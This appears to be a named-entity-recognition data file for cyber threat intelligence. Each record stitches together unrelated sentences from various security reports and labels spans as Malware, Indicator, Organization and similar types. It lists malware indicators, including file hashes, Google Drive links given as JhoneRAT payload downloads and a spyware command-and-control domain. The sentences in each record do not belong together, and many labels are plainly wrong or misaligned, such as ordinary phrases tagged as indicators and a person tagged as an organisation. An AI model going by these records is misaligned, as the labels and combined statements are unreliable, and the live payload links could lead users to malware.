{"text": "mike.jar implements most of the data collection and exfiltration capabilities of this spyware . As expected , OilRig is continuing their onslaught of attacks well into 2018 with continued targeting in the Middle East . JhoneRAT : 6cc0c11c754e1e82bca8572785c27a364a18b0822c07ad9aa2dc26b3817b8aa4 . NIST does not necessarily endorse the views expressed , or concur with the facts presented on these sites .", "spans": [{"start": 0, "end": 8, "label": "Indicator"}, {"start": 110, "end": 116, "label": "Organization"}, {"start": 219, "end": 227, "label": "Malware"}, {"start": 230, "end": 294, "label": "Indicator"}, {"start": 297, "end": 301, "label": "Organization"}]}
{"text": "Of the various binaries downloaded , the most interesting are null , which serves as a local and reverse shell , and rootdaemon , which takes care of privilege escalation and data acquisition . First identified in January 2015 , Orangeworm has also conducted targeted attacks against organizations in related industries as part of a larger supply-chain attack in order to reach their intended victims . JhoneRAT : 7e1121fca3ac7c2a447b61cda997f3a8202a36bf9bb08cca3402df95debafa69 . Antivirus software identifies threats by matching a particular piece of softwares code to programs it has identified as malicious in its database .", "spans": [{"start": 403, "end": 411, "label": "Malware"}, {"start": 414, "end": 478, "label": "Indicator"}, {"start": 481, "end": 499, "label": "Organization"}]}
{"text": "rootdaemon will first attempt to jailbreak the device using a modified version of the DirtyCow exploit . According to Symantec telemetry , almost 40 percent of Orangeworm 's confirmed victim organizations operate within the healthcare industry . JhoneRAT : b4a43b108989d1dde87e58f1fd6f81252ef6ae19d2a5e8cd76440135e0fd6366 . Will Harrison was terminated as an Ashley Madison employee in November 2011 , and by early 2012 he \u2019d turned his considerable harassment skills squarely against the company .", "spans": [{"start": 86, "end": 102, "label": "Vulnerability"}, {"start": 118, "end": 126, "label": "Organization"}, {"start": 224, "end": 243, "label": "Organization"}, {"start": 246, "end": 254, "label": "Malware"}, {"start": 257, "end": 321, "label": "Indicator"}, {"start": 324, "end": 337, "label": "Organization"}, {"start": 359, "end": 373, "label": "Organization"}]}
{"text": "Similarly to another Android spyware made in Italy , originally discovered by Lukas Stefanko and later named Skygofree and analyzed in depth by Kaspersky Labs , Exodus also takes advantage of \" protectedapps '' , a feature in Huawei phones that allows to configure power-saving options for running applications . Their next move was to list any remote shared drives and then attempt to access remote shares owned by the specific government office they were targeting , again attempting to extract all Word documents . JhoneRAT : https://drive.google.com/uc?export=download&amp;id=1vED0wN0arm9yu7C7XrbCdspLjpoPKfrQ . Notably , CADDYWIPER has been the most frequently used disruptive tool against Ukrainian entities during the war and has seen consistent operational use since March 2022 , based on public reporting .", "spans": [{"start": 21, "end": 28, "label": "System"}, {"start": 109, "end": 118, "label": "Malware"}, {"start": 144, "end": 158, "label": "Organization"}, {"start": 161, "end": 167, "label": "Malware"}, {"start": 226, "end": 232, "label": "Organization"}, {"start": 429, "end": 446, "label": "Organization"}, {"start": 501, "end": 515, "label": "Malware"}, {"start": 518, "end": 526, "label": "Malware"}, {"start": 529, "end": 613, "label": "Malware"}, {"start": 626, "end": 636, "label": "Malware"}, {"start": 695, "end": 713, "label": "Organization"}]}
{"text": "By manipulating a SQLite database , Exodus is able to keep itself running even when the screen goes off and the application would otherwise be suspended to reduce battery consumption . Sowbug 's next move was to list any remote shared drives and then attempt to access remote shares owned by the specific government office they were targeting , again attempting to extract all Word documents . JhoneRAT : https://drive.google.com/uc?export=download&amp;id=1LVdv4bjcQegPdKrc5WLb4W7ad6Zt80zl . The campaigns we discovered also involve malicious files intended for users in Poland .", "spans": [{"start": 36, "end": 42, "label": "Malware"}, {"start": 185, "end": 191, "label": "Organization"}, {"start": 305, "end": 322, "label": "Organization"}, {"start": 377, "end": 391, "label": "Malware"}, {"start": 394, "end": 402, "label": "Malware"}, {"start": 405, "end": 489, "label": "Indicator"}, {"start": 562, "end": 577, "label": "Organization"}]}
{"text": "Additionally , rootdaemon attempts to remove its own power usage statistics from Huawei phones ' SystemManager : Similarly , the malicious application probably attempts to minimize traces on Samsung phones by adding to the file /data/data/com.samsung.android.securitylogagent/shared_prefs/apm_sp_status_of_apps.xml the following lines : And adding to the file /data/data/com.samsung.android.securitylogagent/shared_prefs/com.samsung.android.securitylogagent_preferences.xml For example , in September 2016 , Sowbug infiltrated an organization in Asia , deploying the Felismus backdoor on one of its computers , Computer A , using the file name adobecms.exe in CSIDL_WINDOWS\\debug . JhoneRAT : https://drive.google.com/uc?export=download&amp;id=1OlQssMvjb7gI175qDx8SqTgRJIEp5Ypd . Money", "spans": [{"start": 81, "end": 87, "label": "Organization"}, {"start": 191, "end": 198, "label": "Organization"}, {"start": 228, "end": 314, "label": "Indicator"}, {"start": 360, "end": 473, "label": "Indicator"}, {"start": 508, "end": 514, "label": "Organization"}, {"start": 567, "end": 584, "label": "System"}, {"start": 644, "end": 656, "label": "Malware"}, {"start": 660, "end": 679, "label": "Malware"}, {"start": 682, "end": 690, "label": "Malware"}, {"start": 693, "end": 777, "label": "Indicator"}]}
{"text": "these lines instead : Data Collection and Exfiltration As mentioned , mike.jar equips the spyware with extensive collection capabilities , including : Retrieve a list of installed applications . In this case , the attackers maintained a presence on the target 's network for nearly six months between September 2016 and March 2017 . JhoneRAT : https://drive.google.com/uc?export=download&id=1d-toE89QnN5ZhuNZIc2iF4-cbKWtk0FD . This newest edition of the malware includes novel documents containing macros that extract the embedded package once opened and execute it once the document closes instead of having the victim click on a video link as before .", "spans": [{"start": 70, "end": 78, "label": "Indicator"}, {"start": 333, "end": 341, "label": "Malware"}, {"start": 344, "end": 424, "label": "Indicator"}, {"start": 454, "end": 461, "label": "Malware"}]}
{"text": "Record surroundings using the built-in microphone in 3gp format . In other attacks , there was evidence that Felismus was installed using a tool known as Starloader ( detected by Symantec as Trojan.Starloader ) . JhoneRAT : https://drive.google.com/uc?export=download&id=1kbHVkvPIjX49qJ62TBz6drW2YPiiaX2a . The attackers ' aim is to put the organisation in an unbearable position by stopping it from functioning , and then demanding a ransom that can stretch to millions of dollars .", "spans": [{"start": 109, "end": 117, "label": "System"}, {"start": 154, "end": 164, "label": "System"}, {"start": 179, "end": 187, "label": "Organization"}, {"start": 191, "end": 208, "label": "System"}, {"start": 213, "end": 221, "label": "Malware"}, {"start": 224, "end": 304, "label": "Indicator"}]}
{"text": "Retrieve the browsing history and bookmarks from Chrome and SBrowser ( the browser shipped with Samsung phones ) . Symantec has found evidence of Starloader files being named AdobeUpdate.exe , AcrobatUpdate.exe , and INTELUPDATE.EXE among others . JhoneRAT : https://twitter.com/jhone87438316 . They are usually motivated by a cause of some sort , such as highlighting human rights or alerting a large corporation to their system vulnerabilities .", "spans": [{"start": 49, "end": 55, "label": "System"}, {"start": 60, "end": 68, "label": "System"}, {"start": 96, "end": 103, "label": "Organization"}, {"start": 115, "end": 123, "label": "Organization"}, {"start": 146, "end": 162, "label": "Malware"}, {"start": 175, "end": 190, "label": "Malware"}, {"start": 193, "end": 210, "label": "Malware"}, {"start": 217, "end": 232, "label": "Malware"}, {"start": 248, "end": 256, "label": "Malware"}, {"start": 259, "end": 292, "label": "Indicator"}]}
{"text": "Extract events from the Calendar app . Additionally , Starloader was also observed deploying additional tools used by the attackers , such as credential dumpers and keyloggers . New Cyber Espionage Campaigns Targeting Palestinians - Part 2 : The Discovery of the New , Mysterious Pierogi backdoor . When the marital infidelity website AshleyMadison.com learned in July 2015 that hackers were threatening to publish data stolen from 37 million users , the company \u2019s then - CEO Noel Biderman was quick to point the finger at an unnamed former contractor .", "spans": [{"start": 24, "end": 36, "label": "System"}, {"start": 54, "end": 64, "label": "System"}, {"start": 142, "end": 160, "label": "System"}, {"start": 165, "end": 175, "label": "System"}, {"start": 280, "end": 296, "label": "Malware"}, {"start": 335, "end": 352, "label": "Organization"}, {"start": 477, "end": 490, "label": "Organization"}, {"start": 527, "end": 552, "label": "Organization"}]}
{"text": "Extract the calls log . ASERT has learned of an APT campaign , possibly originating from DPRK , we are calling STOLEN PENCIL that is targeting academic institutions since at least May 2018 . Since December 2019 , the Cybereason Nocturnus team has been investigating a campaign targeting Palestinian individuals and entities in the Middle East , mostly within the Palestinian territories . If more groups start adopting CL0P 's zero - day exploitation techniques , the ransomware landscape could tilt from service - oriented attacks to a more aggressive , vulnerability - focused model \u2014 a move that could skyrocket the number of victims .", "spans": [{"start": 24, "end": 29, "label": "Organization"}, {"start": 143, "end": 164, "label": "Organization"}, {"start": 217, "end": 237, "label": "Organization"}, {"start": 419, "end": 461, "label": "Organization"}]}
{"text": "Record phone calls audio in 3gp format . Once gaining a foothold on a user 's system , the threat actors behind STOLEN PENCIL use Microsoft 's Remote Desktop Protocol ( RDP ) for remote point-and-click access . This campaign uses social engineering and decoy documents related to geopolitical affairs and relations between the Palestinian government , and references Egypt , Hezbollah , and Iran . As with other groups , it is possible that espionage and intelligence gathering are the first steps toward deploying ransomware or wiper malware .", "spans": [{"start": 130, "end": 139, "label": "Organization"}, {"start": 143, "end": 166, "label": "System"}, {"start": 169, "end": 172, "label": "System"}, {"start": 327, "end": 349, "label": "Organization"}]}
{"text": "Take pictures with the embedded camera . The group uses an advanced piece of malware known as Remsec ( Backdoor.Remsec ) to conduct its attacks . Part one of this research investigates the Spark campaign , where attackers use social engineering to infect victims , mainly from the Palestinian territories , with the Spark backdoor . With ThreatConnect , teams get a single Platform to simplify the processing , categorization , and response to suspicious emails , reducing the time to remediate active threats from days to minutes .", "spans": [{"start": 94, "end": 100, "label": "System"}, {"start": 103, "end": 118, "label": "System"}, {"start": 316, "end": 330, "label": "Malware"}, {"start": 338, "end": 351, "label": "System"}, {"start": 373, "end": 381, "label": "System"}]}
{"text": "Collect information on surrounding cellular towers ( BTS ) . Strider has been active since at least October 2011 . For more information about part one , click here . Because indicators of attack are all about interactions with your network , it may be possible that the actions performed during the early stages of the cyberattack kill chain are not considered harmful .", "spans": [{"start": 61, "end": 68, "label": "Organization"}, {"start": 174, "end": 194, "label": "Indicator"}]}
{"text": "Extract the address book . Lua modules is a technique that has previously been used by Flamer . During the attacks , victims are infected with a previously undocumented backdoor , dubbed Pierogi by Cybereason . The frameworks evolving realworld tactics , techniques and procedures can help organizations better understand how to allocate resources properly to detect ransomware early enough to prevent a successful attack .", "spans": [{"start": 12, "end": 24, "label": "System"}, {"start": 27, "end": 38, "label": "System"}, {"start": 169, "end": 177, "label": "Malware"}, {"start": 187, "end": 194, "label": "Malware"}, {"start": 198, "end": 208, "label": "Organization"}]}
{"text": "Extract the contacts list from the Facebook app . The Remsec malware used by Strider has a modular design . This backdoor allows attackers to spy on targeted victims . This includes hosting C&C domains that were used by Winnti such as mtrue.com , shenqi[.]kr and zhu[.]kr .", "spans": [{"start": 35, "end": 47, "label": "System"}, {"start": 54, "end": 68, "label": "System"}, {"start": 77, "end": 84, "label": "Organization"}, {"start": 113, "end": 121, "label": "Malware"}, {"start": 182, "end": 273, "label": "Indicator"}]}
{"text": "Extract logs from Facebook Messenger conversations . The group has maintained a low profile until now and its targets have been mainly organizations and individuals that would be of interest to a nation state 's intelligence services . Cybereason suspects that the backdoor may have been obtained in underground communities rather than home-grown , as the evidence found in the code of the backdoor suggests it may have been developed by Ukranian-speaking hackers . Malware detections do n\u2019t matter nearly as much as malware damage \u2014 just one ransomware attack can close your business .", "spans": [{"start": 18, "end": 36, "label": "System"}, {"start": 212, "end": 233, "label": "Organization"}, {"start": 236, "end": 246, "label": "Organization"}, {"start": 265, "end": 273, "label": "Malware"}]}
{"text": "Take a screenshot of any app in foreground . The group 's targets include a number of organizations and individuals located in Russia . The tactics , techniques , and procedures ( TTPs ) , content , and theme of the decoy documents , as well as the victimology observed in the campaign , resemble previous attacks that have targeted Palestinians . Researchers at Akamai reported on a Magecart skimmer campaign disguised as Google Tag Manager that also made the news with the compromise of one of Canada 's largest liquor store ( LCBO ) .", "spans": [{"start": 363, "end": 369, "label": "Organization"}, {"start": 384, "end": 409, "label": "Organization"}, {"start": 423, "end": 441, "label": "System"}, {"start": 496, "end": 535, "label": "Organization"}]}
{"text": "Extract information on pictures from the Gallery . Remsec uses a Lua interpreter to run Lua modules which perform various functions . In particular , these campaigns appear to be related to attacks carried out by a group called MoleRATs ( aka , Gaza Cyber Gang , Moonlight ) , an Arabic-speaking , politically motivated group that has been operating in the Middle East since 2012 . One can only guess how they will be used .", "spans": [{"start": 51, "end": 57, "label": "System"}, {"start": 65, "end": 80, "label": "System"}, {"start": 88, "end": 99, "label": "System"}, {"start": 228, "end": 236, "label": "Organization"}, {"start": 245, "end": 260, "label": "Organization"}, {"start": 263, "end": 272, "label": "Organization"}, {"start": 382, "end": 422, "label": "Indicator"}]}
{"text": "Extract information from th GMail app . Russia . Cyber Espionage with a New Malware : The Cybereason Nocturnus team has discovered recent , targeted attacks in the Middle East to deliver the Pierogi backdoor for politically-driven cyber espionage . Ukrainian and Polish government and military organizations among those targeted Talos first discovered a campaign in late April using several malicious files very likely intended for users in Ukraine , based on the content of the lure displayed when the target opens a malicious Microsoft Excel file .", "spans": [{"start": 28, "end": 33, "label": "System"}, {"start": 90, "end": 110, "label": "Organization"}, {"start": 191, "end": 207, "label": "Malware"}, {"start": 249, "end": 258, "label": "Organization"}, {"start": 263, "end": 280, "label": "Organization"}, {"start": 285, "end": 307, "label": "Organization"}, {"start": 329, "end": 334, "label": "Organization"}, {"start": 432, "end": 448, "label": "Organization"}]}
{"text": "Dump data from the IMO messenger app . The attackers then began to perform reconnaissance activities on Computer A via cmd.exe , collecting system-related information , such as the OS version , hardware configuration , and network information . Targeting Palestinians : The campaigns seems to target Palestinian individuals and entities , likely related to the Palestinian government . Harrison signed his threatening missive with the salutation , \u201c We are legion , \u201d suggesting that whatever comeuppance he had in store for Ashley Madison would come from a variety of directions and anonymous hackers .", "spans": [{"start": 23, "end": 32, "label": "System"}, {"start": 119, "end": 126, "label": "Malware"}, {"start": 129, "end": 166, "label": "Malware"}, {"start": 361, "end": 383, "label": "Organization"}, {"start": 386, "end": 394, "label": "Organization"}, {"start": 525, "end": 539, "label": "Organization"}]}
{"text": "Extract call logs , contacts and messages from the Skype app . the group 's targets include an organization in Sweden . Using Geopolitically-charged Lure Content : The attackers use specially crafted lure content to trick their targets into opening malicious files that infect the victim \u2019s machine with the Pierogi backdoor . The name \u201c Anonymous Sudan \u201d is likely an attempted appropriation of the brand of the well - known hacktivist collective \u201c Anonymous , \u201d similar to another KillNet affiliate , \u201c Anonymous Russia . \u201d", "spans": [{"start": 51, "end": 56, "label": "System"}, {"start": 308, "end": 324, "label": "Malware"}, {"start": 338, "end": 353, "label": "Organization"}, {"start": 505, "end": 521, "label": "Organization"}]}
{"text": "Retrieve all SMS messages . the group 's targets include an embassy in Belgium . The decoy content of the malicious files revolves around various political affairs in the Middle East , specifically targeting the tension between Hamas and other entities in the region . All of these things point to threat actors and groups like Winnti will continue to try different methods of attack .", "spans": [{"start": 60, "end": 67, "label": "Organization"}, {"start": 298, "end": 311, "label": "Organization"}, {"start": 328, "end": 334, "label": "Organization"}]}
{"text": "Extract messages and the encryption key from the Telegram app . Symantec will continue to search for more Remsec modules and targets in order to build upon our understanding of Strider and better protect our customers . Perpetrated by an Arabic-speaking APT , MoleRATs : The modus-operandi of the attackers as well as the social engineering decoy content seem aligned with previous attacks carried out by an Arabic-speaking APT group called MoleRATs ( aka Gaza Cybergang ) . .bat \"", "spans": [{"start": 49, "end": 57, "label": "System"}, {"start": 64, "end": 72, "label": "Organization"}, {"start": 106, "end": 120, "label": "System"}, {"start": 177, "end": 184, "label": "Organization"}, {"start": 260, "end": 268, "label": "Organization"}, {"start": 441, "end": 449, "label": "Organization"}, {"start": 456, "end": 470, "label": "Organization"}, {"start": 475, "end": 481, "label": "Indicator"}]}
{"text": "Dump data from the Viber messenger app . Another such an exceptional espionage platform is \" ProjectSauron , also known as \" Strider \" . This group has been operating in the Middle East since 2012 . Indicators of compromise help answer the question What happened while indicators of attack can help answer questions like What is happening and why A proactive approach to detection uses both IOAs and IOCs to discover security incidents or threats in as close to real time as possible .", "spans": [{"start": 19, "end": 34, "label": "System"}, {"start": 93, "end": 106, "label": "System"}, {"start": 125, "end": 132, "label": "Organization"}]}
{"text": "Extract logs from WhatsApp . In September 2015 , our anti-targeted attack technologies caught a previously unknown attack . Similar to previous attacks , this campaign starts with social engineering . As confirmed by our own research data , CISA also found LockBit took the top spot as the biggest global ransomware threat in 2022 .", "spans": [{"start": 18, "end": 26, "label": "System"}, {"start": 241, "end": 245, "label": "Organization"}, {"start": 257, "end": 264, "label": "Organization"}]}
{"text": "Retrieve media exchanged through WhatsApp . Forensic analysis indicates that the APT has been operational since at least June 2011 and was still active in 2016 . In one instance , it lures victims to open an email attachment . Rhysida , a new ransomware gang claiming to be a \" cybersecurity team , \" has been in operation since May 17 , 2023 , making headlines for their high - profile attack against the Chilean Army .", "spans": [{"start": 33, "end": 41, "label": "System"}, {"start": 208, "end": 213, "label": "System"}, {"start": 227, "end": 234, "label": "Organization"}, {"start": 406, "end": 418, "label": "Organization"}]}
{"text": "Extract the Wi-Fi network 's password . After getting the IP , the ProjectSauron component tries to communicate with the remote server using its own ( ProjectSauron ) protocol as if it was yet another C&C server . In others , it persuades victims to download a report about a recent political affair pertaining to the Middle East and specifically to Palestinian matters . CrowdStrike Services recently investigated several Play ransomware intrusions where the common entry vector was suspected to be the Microsoft Exchange ProxyNotShell vulnerabilities CVE-2022 - 41040 and CVE-2022 - 41082 .", "spans": [{"start": 67, "end": 80, "label": "System"}, {"start": 151, "end": 164, "label": "System"}, {"start": 372, "end": 392, "label": "Organization"}, {"start": 504, "end": 522, "label": "System"}, {"start": 523, "end": 552, "label": "Vulnerability"}, {"start": 553, "end": 569, "label": "Vulnerability"}, {"start": 574, "end": 590, "label": "Vulnerability"}]}
{"text": "Extract data from WeChat app . In a number of the cases we analyzed , ProjectSauron deployed malicious modules inside the custom network encryption 's software directory , disguised under similar filenames and accessing the data placed beside its own executable . In most cases , the downloaded file is either an executable that masquerades as a Microsoft Word document or a weaponized Microsoft Word document . According to a recent study by Trellix and the Center for Strategic and International Studies CSIS , 86 of organizations believe they have been targeted by a nationstate threat actor .", "spans": [{"start": 18, "end": 24, "label": "System"}, {"start": 70, "end": 83, "label": "System"}, {"start": 93, "end": 110, "label": "System"}, {"start": 346, "end": 369, "label": "System"}, {"start": 375, "end": 400, "label": "System"}, {"start": 443, "end": 450, "label": "Organization"}, {"start": 459, "end": 510, "label": "Organization"}, {"start": 519, "end": 532, "label": "Organization"}, {"start": 570, "end": 594, "label": "Organization"}]}
{"text": "Extract current GPS coordinates of the phone . The threat actor behind ProjectSauron commands a top-of-the-top modular cyber-espionage platform in terms of technical sophistication , designed to enable long-term campaigns through stealthy survival mechanisms coupled with multiple exfiltration methods . As soon as the victim double-clicks on the dropper , they are presented with the decoy document . We highly suspect the \u201c Pig network \u201d to have also been used as a bulletproof hosting service for cybercriminals who are unrelated to the Winnti group .", "spans": [{"start": 71, "end": 84, "label": "System"}, {"start": 426, "end": 437, "label": "System"}, {"start": 468, "end": 495, "label": "System"}, {"start": 540, "end": 552, "label": "Organization"}]}
{"text": "While some of these acquisition are performed purely through code in mike.jar , some others that require access to , for example , SQLite databases or other files in the application 's storage are performed through rootdaemon instead , which should be running with root privileges . In September 2015 , Kaspersky Lab 's Anti-Targeted Attack Platform discovered anomalous network traffic in a government organization network . The document lowers the victim \u2019s suspicions by distracting them with a real document while the dropper installs the backdoor . This file contains the ransom note .", "spans": [{"start": 69, "end": 77, "label": "Indicator"}, {"start": 303, "end": 316, "label": "Organization"}, {"start": 361, "end": 386, "label": "Malware"}, {"start": 392, "end": 415, "label": "Organization"}, {"start": 543, "end": 551, "label": "Malware"}, {"start": 554, "end": 588, "label": "Indicator"}]}
{"text": "In order to achieve this , mike.jar connects to rootdaemon through various TCP ports that the daemon binds on some extraction routines for supported applications : Port 6202 : WhatsApp extraction service . In late 2015 , Symantec identified suspicious activity involving a hacking tool used in a malicious manner against one of our customers . However , some of the documents also play an additional role in the attack . On Oct. 10 , 2023 , Citrix released a security bulletin for a sensitive information disclosure vulnerability ( CVE-2023 - 4966 ) impacting NetScaler ADC and NetScaler Gateway appliances .", "spans": [{"start": 27, "end": 35, "label": "Indicator"}, {"start": 164, "end": 173, "label": "Indicator"}, {"start": 176, "end": 184, "label": "System"}, {"start": 221, "end": 229, "label": "Organization"}, {"start": 332, "end": 341, "label": "Organization"}, {"start": 532, "end": 547, "label": "Vulnerability"}]}
{"text": "Ports 6203 and 6204 : Facebook extraction service . Secondary ProjectSauron modules are designed to perform specific functions like stealing documents , recording keystrokes , and hijacking encryption keys from both infected computers and attached USB sticks . While some are more neutral , quoting from newspapers and the media , others seem to report fake news to spread misinformation that serves a political agenda . Ways our customers can detect and block this threat are listed below .", "spans": [{"start": 0, "end": 19, "label": "Indicator"}, {"start": 22, "end": 30, "label": "Organization"}, {"start": 62, "end": 83, "label": "System"}]}
{"text": "Port 6205 : Gmail extraction service . activity originated from three separate IP addresses , all located in Chengdu , China . With regards to decoy content themes , this campaign resembles previous campaigns reported in blogs by Vectra , Unit 42 , and Talos . Education accounts for a huge proportion of known Vice Society attacks .", "spans": [{"start": 0, "end": 9, "label": "Indicator"}, {"start": 12, "end": 17, "label": "System"}, {"start": 239, "end": 246, "label": "Organization"}, {"start": 253, "end": 258, "label": "Organization"}, {"start": 311, "end": 331, "label": "Organization"}]}
{"text": "Port 6206 : Skype extraction service . We don't know the exact date Suckfly stole the certificates from the South Korean organizations . The contents of the decoy documents seems to include : This was followed by an executable downloader and payload concealed in an image file , likely to make its detection more difficult .", "spans": [{"start": 0, "end": 9, "label": "Indicator"}, {"start": 12, "end": 17, "label": "System"}]}
{"text": "Port 6207 : Viber extraction service . stolen certificates being used maliciously occurred in early 2014 . Potentially fake documents that appear to be issued by the Palestinian government . The alert described emails that delivered an Evernotethemed lure to entice targeted recipients into downloading a trojan .", "spans": [{"start": 0, "end": 9, "label": "Indicator"}, {"start": 12, "end": 17, "label": "System"}, {"start": 166, "end": 188, "label": "Organization"}]}
{"text": "Port 6208 : IMO extraction service . Symantec detects this threat as Backdoor.Nidiran . Meetings minutes of different Palestinian organizations . Request a demo meeting with us or reach out to us at salesthreatconnect.com to see how we can help automate phishing analysis and response for your organization .", "spans": [{"start": 0, "end": 9, "label": "Indicator"}, {"start": 12, "end": 15, "label": "System"}, {"start": 37, "end": 45, "label": "Organization"}, {"start": 69, "end": 85, "label": "Malware"}, {"start": 199, "end": 221, "label": "Organization"}]}
{"text": "Port 6209 : Telegram extraction service . Specifically , Suckfly used a specially crafted web page to deliver an exploit for the Microsoft Windows OLE Remote Code Execution Vulnerability ( CVE-2014-6332 ) , which affects specific versions of Microsoft Windows . News about Hamas and the Palestinian National Authority . The contents found in secure[.]66[.]to often lead to zhu[.]vn , which is Hack520 \u2019s domain for hosting his own private blog .", "spans": [{"start": 0, "end": 9, "label": "Indicator"}, {"start": 12, "end": 20, "label": "System"}, {"start": 129, "end": 186, "label": "Vulnerability"}, {"start": 189, "end": 202, "label": "Vulnerability"}, {"start": 287, "end": 317, "label": "Organization"}, {"start": 342, "end": 358, "label": "Indicator"}, {"start": 373, "end": 381, "label": "Indicator"}, {"start": 393, "end": 400, "label": "Organization"}]}
{"text": "Port 6210 : SBrowser extraction service . The threat then executes \" svchost.exe \" . Potentially fake , leaked Hamas documents . \" These [ Rising Sun ] implants were all based on the original Backdoor Duuzer source code , \" the researchers say in their report .", "spans": [{"start": 0, "end": 9, "label": "Indicator"}, {"start": 12, "end": 20, "label": "System"}, {"start": 69, "end": 80, "label": "System"}, {"start": 139, "end": 149, "label": "System"}, {"start": 192, "end": 219, "label": "Malware"}]}
{"text": "Port 6211 : Calendar extraction service . Attackers have been known to distribute malicious files masquerading as the legitimate iviewers.dll file and then use DLL load hijacking to execute the malicious code and infect the computer . Criticism of and embarrassing content about Hamas . This includes tens of thousands of terminals outside of Ukraine that , among other things , support wind turbines and provide Internet services to private citizens .", "spans": [{"start": 0, "end": 9, "label": "Indicator"}, {"start": 12, "end": 20, "label": "System"}, {"start": 82, "end": 97, "label": "Malware"}, {"start": 129, "end": 146, "label": "System"}, {"start": 160, "end": 178, "label": "System"}]}
{"text": "Port 6212 : Chrome extraction service . Once exploit has been achieved , Nidiran is delivered through a self-extracting executable that extracts the components to a .tmp folder after it has been executed . APA S-IDTY adopted resolution Unlimited support for Palestinian people.docx : We can not independently confirm KillMilk 's claims of having previous affiliation with the hacktivist group Universal Dark Service .", "spans": [{"start": 0, "end": 9, "label": "Indicator"}, {"start": 12, "end": 18, "label": "System"}, {"start": 73, "end": 80, "label": "System"}, {"start": 104, "end": 130, "label": "System"}, {"start": 165, "end": 169, "label": "Malware"}, {"start": 206, "end": 281, "label": "Indicator"}, {"start": 393, "end": 415, "label": "Organization"}]}
{"text": "These services appear to be running on all network interfaces and are therefore accessible to anyone sharing a local network with an infected device . The certificates Blackfly stole were also from South Korean companies , primarily in the video game and software development industry . Describes a resolution by the Asian Parliamentary Assembly ( APA ) held in Anatalya , announcing unlimited support for the Palestinian people 7b4c736b92ce702fb584845380e237aa55ddb4ef693ea65a766c9d9890b3852c . jalsa.rar : The attackers behind Earth Vetala use features of remote access software to steal sensitive information or download malware for additional cyber operations , leveraging spearphishing emails and lure documents containing embedded links to a legitimate filesharing service Onehub to distribute archives containing the ScreenConnect remote administrator tool and RemoteUtilities software .", "spans": [{"start": 211, "end": 220, "label": "Organization"}, {"start": 240, "end": 284, "label": "Organization"}, {"start": 317, "end": 345, "label": "Organization"}, {"start": 348, "end": 351, "label": "Organization"}, {"start": 429, "end": 493, "label": "Indicator"}, {"start": 496, "end": 505, "label": "Indicator"}, {"start": 529, "end": 541, "label": "Organization"}, {"start": 779, "end": 785, "label": "System"}, {"start": 824, "end": 863, "label": "System"}, {"start": 868, "end": 892, "label": "System"}]}
{"text": "Following we can see an example of a connection to port 6209 which is used to extract data from the Telegram app . Blackfly began with a campaign to steal certificates , which were later used to sign malware used in targeted attacks . Contains the above mentioned document , as well as photos of the assemblies and political cartoons criticizing Hamas 50a597aa557084e938e2a987ec5db99187428091e8141e616cced72e6a39de1b . Cisco Duo provides multi - factor authentication for users to ensure only those authorized are accessing your network .", "spans": [{"start": 51, "end": 60, "label": "Indicator"}, {"start": 100, "end": 108, "label": "System"}, {"start": 115, "end": 123, "label": "Organization"}, {"start": 352, "end": 416, "label": "Indicator"}, {"start": 419, "end": 428, "label": "System"}]}
{"text": "We are able to send commands to the service such as dumpmsgdb or getkey ( which dumps the tgnet.dat file ) . In March 2016 , Symantec published a blog on Suckfly , an advanced cyberespionage group that conducted attacks against a number of South Korean organizations to steal digital certificates . Internet in government.pdf / Define the Internet in government institutions.pdf : These observations leave open the possibility that COSMICENERGY was developed with malicious intent , and at a minimum that it can be used to support targeted threat activity in the wild .", "spans": [{"start": 90, "end": 104, "label": "Indicator"}, {"start": 125, "end": 133, "label": "Organization"}, {"start": 299, "end": 325, "label": "Indicator"}, {"start": 328, "end": 378, "label": "Indicator"}, {"start": 432, "end": 444, "label": "Malware"}]}
{"text": "Data acquired from mike.jar 's extraction modules is normally XORed and stored in a folder named .lost+found on the SD card . Since then we have identified a number of attacks over a two-year period , beginning in April 2014 , which we attribute to Suckfly . Announcement about a new regulation regarding internet usage in Palestinian government institutions . A Cl0p representative confirmed that they had been testing the vulnerability since July 2021 and that they had decided to deploy it over the Memorial Day weekend .", "spans": [{"start": 19, "end": 27, "label": "Indicator"}, {"start": 323, "end": 345, "label": "Organization"}, {"start": 363, "end": 367, "label": "Organization"}]}
{"text": "Data is eventually exfiltrated over a TLS connection to the Command & Control server ws.my-local-weather [ . The attacks targeted high-profile targets , including government and commercial organizations . The announcement states that porn , gambling and entertainment sites will be blocked 9e4464d8dc8a3984561a104a93a7b8d6eb3d622d5187ae1d3fa6f6dafa2231a8 . Previous versions of TIEDYE were configured to persist via a LaunchAgent .", "spans": [{"start": 78, "end": 108, "label": "Indicator"}, {"start": 163, "end": 173, "label": "Organization"}, {"start": 178, "end": 202, "label": "Organization"}, {"start": 290, "end": 354, "label": "Indicator"}, {"start": 357, "end": 384, "label": "Malware"}]}
{"text": "] com through an upload queue . these attacks were part of a planned operation against specific targets in India . Congratulations_Jan-7.pdf : Inside , we break down the 5 most dangerous threats facing businesses this year \u2014 including LockBit and SocGholish \u2014 dissecting how they \u2019re delivered , where they spread , what they destroy , and the best practices to protect against them .", "spans": [{"start": 115, "end": 140, "label": "Indicator"}, {"start": 235, "end": 242, "label": "Malware"}, {"start": 247, "end": 257, "label": "Malware"}]}
{"text": "As mentioned before , our test device was automatically from stage one to stage two , which started collecting data . While there have been several Suckfly campaigns that infected organizations with the group 's custom malware Backdoor.Nidiran , the Indian targets show a greater amount of post-infection activity than targets in other regions . Letter allegedly from the Barcelona B-IDTY branch E-LOC of the SysUpdate has been in use by Budworm since at least 2020 , and the attackers appear to continually develop the tool to improve its capabilities and avoid detection .", "spans": [{"start": 227, "end": 243, "label": "Malware"}, {"start": 409, "end": 418, "label": "Malware"}, {"start": 438, "end": 445, "label": "Organization"}, {"start": 476, "end": 485, "label": "Organization"}]}
